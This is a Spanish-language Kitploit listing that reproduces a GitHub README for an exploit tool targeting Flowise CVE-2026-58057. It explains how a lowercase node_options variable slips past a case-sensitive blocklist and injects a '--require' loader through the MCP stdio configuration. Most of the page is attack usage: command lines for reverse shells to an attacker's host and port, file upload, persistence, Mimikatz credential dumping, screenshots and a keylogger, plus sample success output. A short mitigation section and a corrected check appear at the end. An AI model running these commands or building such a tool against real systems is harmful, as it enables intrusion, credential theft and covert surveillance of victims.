Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Flowise-CVE-2026-58057-exploit — Exploit de RCE de Flowise para Windows (CVE-2026-58057). Omite la validación de variables de entorno mediante una falla que distingue entre mayúsculas y minúsculas. Usa node_options para inyectar código arbitrario a través de MCP stdio. Admite reverse shell, persistencia, subida de archivos y volcado de credenciales. Solo para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Mecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónComando y ControlRed Teaming
Desarrollo de Payloads
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Ver Repositorio
19hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Exploit de RCE de Flowise para Windows (CVE-2026-58057). Omite la validación de variables de entorno mediante una falla que distingue entre mayúsculas y minúsculas. Usa node_options para inyectar código arbitrario a través de MCP stdio. Admite reverse shell, persistencia, subida de archivos y volcado de credenciales. Solo para pruebas de seguridad autorizadas.

Compartir

Flowise CVE-2026-58057 - Exploit de ejecución remota de código en Windows

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge

Affected Versions Badge
Fixed Version Badge

📋 Descripción general

Este es un exploit de nivel de producción para CVE-2026-58057, una vulnerabilidad crítica de ejecución remota de código en Flowise en plataformas Windows. La vulnerabilidad se origina en una validación de variables de entorno que distingue entre mayúsculas y minúsculas y no bloquea node_options en minúsculas, lo que permite a los atacantes omitir la lista de bloqueo de NODE_OPTIONS y ejecutar código arbitrario a través de la configuración stdio de Custom MCP.

El exploit demuestra prácticas profesionales de ingeniería de software con arquitectura modular, manejo integral de errores y soporte para múltiples tipos de payload.

f1

f2

⚠️ Descargo de responsabilidad

IMPORTANTE: Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas, pruebas de penetración y fines educativos. El autor no es responsable de ningún uso indebido o daño causado por este software. Obtenga siempre la autorización adecuada antes de probar cualquier sistema.

🔍 Detalles técnicos

Causa raíz de la vulnerabilidad

root@kitploit:~
# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

Mecanismo del exploit

  1. El atacante se autentica en Flowise

  2. Crea/Modifica el nodo Custom MCP stdio

  3. Inyecta la variable de entorno node_options en minúsculas

  4. Establece el valor en --require malicious-loader.js

  5. Node.js ejecuta el loader cuando se ejecuta MCP stdio

  6. Se logra la ejecución de código arbitrario

✨ Características

Capacidades principales

  • ✅ Reverse Shell - Conexión de regreso a la máquina del atacante

  • ✅ Bind Shell - Abre un puerto de escucha en el objetivo

  • ✅ Ejecución de comandos - Ejecuta comandos arbitrarios del sistema

  • ✅ Subida de archivos - Sube archivos al sistema objetivo

  • ✅ Persistencia - Múltiples mecanismos de persistencia

  • ✅ Recopilación de información - Recopila inteligencia del sistema

  • ✅ Volcado de credenciales - Integración con Mimikatz

  • ✅ Captura de pantalla - Captura capturas de pantalla del escritorio

  • ✅ Keylogger - Instala capacidad de registro de teclas

Características técnicas

  • 🔐 Múltiples métodos de autenticación - Clave API o nombre de usuario/contraseña

  • 🔄 Lógica de reintento automático - Resistente ante problemas de red

  • 🧹 Autolimpieza - Elimina los archivos loader del objetivo

  • 🌐 Multiplataforma - Funciona en Windows/Linux/macOS

  • 🎨 Salida con colores - Legibilidad mejorada

  • 📊 Depuración detallada - Registro detallado para la resolución de problemas

📦 Instalación

Requisitos previos

  • Python 3.6 o superior

  • pip (administrador de paquetes de Python)

Instalación rápida

root@kitploit:~
# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Instalación con Docker (opcional)

root@kitploit:~
FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Uso

Opciones de línea de comandos

root@kitploit:~
python3 exploit.py --help

Opciones de autenticación

OpciónDescripciónEjemplo
-t, --targetURL de Flowise (requerida)http://localhost:3000
-k, --api-keyClave API de Flowiseflowise_abc123...
-u, --usernameNombre de usuarioadmin
-p, --passwordContraseñapassword123

Opciones de payload

OpciónDescripciónEjemplo
--payloadTipo de payloadreverse_shell
--lhostHost del listener192.168.1.100
--lportPuerto del listener4444
--commandComando a ejecutarwhoami
--local-fileArchivo a subirpayload.exe
--remote-pathRuta remota de guardadoC:\\Temp\\update.exe

Opciones de ejecución

OpciónDescripción
--interactiveIniciar shell interactivo
--verboseHabilitar salida de depuración
--timeoutTiempo de espera de la solicitud en segundos
--retriesNúmero de reintentos

📝 Ejemplos de uso

1. Reverse Shell básico

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Reverse Shell interactivo

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Ejecución de comandos

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. Subida de archivos

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Volcado de credenciales (Mimikatz)

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Instalación de persistencia

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. Recopilación de información

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. Captura de pantalla

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 Tipos de payload

PayloadDescripciónArgumentos
reverse_shellConexión de regreso al listener--lhost, --lport
bind_shellAbrir puerto de escucha--lport
command_execEjecutar comando--command
file_uploadSubir archivo al objetivo--local-file, --remote-path
persistenceInstalar persistenciaNinguno
info_gatherRecopilar información del sistemaNinguno
mimikatzVolcar credencialesNinguno
screenshotCapturar pantallaNinguno
keyloggerInstalar keyloggerNinguno

🛡️ Mitigación

Actualizar Flowise

root@kitploit:~
# Upgrade to version 3.1.3 or later
npm install -g flowise@latest
# or
docker pull flowiseai/flowise:latest

Soluciones alternativas

  • Restringir el acceso a la configuración de Custom MCP

  • Implementar segmentación de red

  • Supervisar variables de entorno sospechosas

  • Usar un firewall de aplicaciones web (WAF)

Código corregido

root@kitploit:~
# Fixed Validation (Case-Insensitive)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key.upper() in dangerous:  # Case-insensitive check
    raise ValueError(f"Modification not allowed")

📊 Ejemplos de salida

Exploit exitoso

root@kitploit:~
[14:32:15] ℹ Starting exploit sequence...
[14:32:15] ℹ Attempting authentication...
[14:32:16] ✓ Authenticated with API key
[14:32:16] ℹ Preparing reverse_shell payload execution...
[14:32:16] ℹ Injecting environment variable...
[14:32:17] ℹ Triggering payload execution...
[14:32:19] ✓ Payload 'reverse_shell' executed successfully!
[14:32:19] ℹ Reverse shell listener ready on 192.168.1.50:4444

Modo verbose

root@kitploit:~
[14:32:15] 🔍 Session created with retry strategy
[14:32:15] 🔍 Using existing workspace: ws_123456
[14:32:16] 🔍 Loader written: /tmp/loader_1234_1234567890.js
[14:32:16] 🔍 MCP stdio configuration updated

🐛 Solución de problemas

Problemas comunes

ProblemaSolución
Error de certificado SSLpip install --trusted-host pypi.org -r requirements.txt
Permiso denegadopip install --user -r requirements.txt
Conexión rechazadaVerifica la URL del objetivo y la conectividad de red
Autenticación fallidaRevisa la clave API o el nombre de usuario/contraseña
El payload fallaUsa --verbose para una depuración detallada
Versión de PythonAsegúrate de tener Python 3.6+ instalado

Comandos de depuración

root@kitploit:~
# Enable verbose logging
python3 exploit.py -t http://localhost:3000 -k API_KEY --verbose

# Test connectivity
curl -k https://localhost:3000/api/v1/version

# Check Python version
python3 --version

📁 Estructura de archivos

root@kitploit:~
flowise-CVE-2026-58057-exploit/
├── exploit.py          # Main exploit script
├── requirements.txt    # Core dependencies
├── README.md          # This documentation
├── LICENSE            # MIT License
└── CHANGELOG.md       # Version history

🤝 Contribuciones

  1. Haz un fork del repositorio

  2. Crea una rama de características (git checkout -b feature/amazing)

  3. Haz commit de los cambios (git commit -m 'Add amazing feature')

  4. Sube la rama (git push origin feature/amazing)

  5. Abre un Pull Request

📜 Licencia

Este proyecto está bajo la Licencia MIT; consulta el archivo LICENSE para más detalles.

🏆 Agradecimientos

  • FlowiseAI por el producto

  • A los investigadores de seguridad que descubrieron vulnerabilidades similares

  • A la comunidad de pentesting por las metodologías de pruebas

🔗 Referencias

  • CVE-2026-58057

  • Repositorio de Flowise en GitHub

  • Documentación de Flowise

  • Seguridad de variables de entorno en Node.js

📧 Contacto

Autor: Sudeepa Wanigarathna Investigador de seguridad y pentester

⭐ Soporte

Si encuentras útil esta herramienta, considera:

  • ⭐ Marcar el repositorio con una estrella en GitHub

  • 🔔 Seguir para recibir actualizaciones

  • 📝 Reportar problemas o sugerencias


Hecho con ❤️ para la comunidad de seguridad

Descargar herramienta